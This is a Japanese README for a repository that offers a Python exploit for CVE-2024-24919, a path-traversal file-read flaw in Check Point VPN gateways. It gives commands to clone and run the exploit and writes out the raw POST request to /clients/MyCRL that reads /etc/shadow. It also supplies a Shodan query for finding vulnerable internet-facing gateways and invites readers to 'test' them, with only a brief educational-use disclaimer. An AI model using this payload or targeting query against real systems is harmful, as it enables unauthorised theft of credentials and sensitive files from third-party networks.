
CVE-2024-24919 エクスプロイトおよびPoC - リモートアクセスVPNまたはモバイルアクセス向けのクリティカルなLFI
このリポジトリには、CVE-2024-24919 に対する Python エクスプロイトが含まれています。この脆弱性により、脆弱なページから機密ファイルを読み取ることができます。
このエクスプロイトは、まずターゲットが脆弱かどうかを確認し、次に指定されたパスを取得します。
重要度: クリティカル
まずリポジトリをクローンします:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
権限を付与し、python3 でエクスプロイトを実行します
chmod +x exploit.py
python3 exploit.py
その後、手順に従うと、指定したファイルのデータを取得できます
問題がある場合は、指定する URL がメインのものであることを確認してください
✓ https://google.com
✘ https://google.com/search?client=firefox
まず、ウェブサイトがリモートアクセス VPN またはモバイルアクセスソフトウェアが有効になっている Check Point Security Gateway であることを確認する必要があります。
このエクスプロイトでは、{ip}/clients/MyCRL エンドポイントを対象としています。
このエンドポイントは、POST リクエストを行い、CSHELL/ という文字列と、パス横断を使用して読み取りたいファイルのパスを追加すると脆弱になります。
リクエストは次のようになります:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
これはソースコードを調べて得たものです。
プロセスの詳細については、こちらの投稿を確認してください --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
この脆弱性をテストしたい場合は、Sodan を使用して脆弱なウェブサイトを見つけることができます。Sodan で以下のクエリを使用します
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
このスクリプトは教育目的のみで使用してください。責任を持って使用し、アクセス許可のあるシステムでのみ使用してください。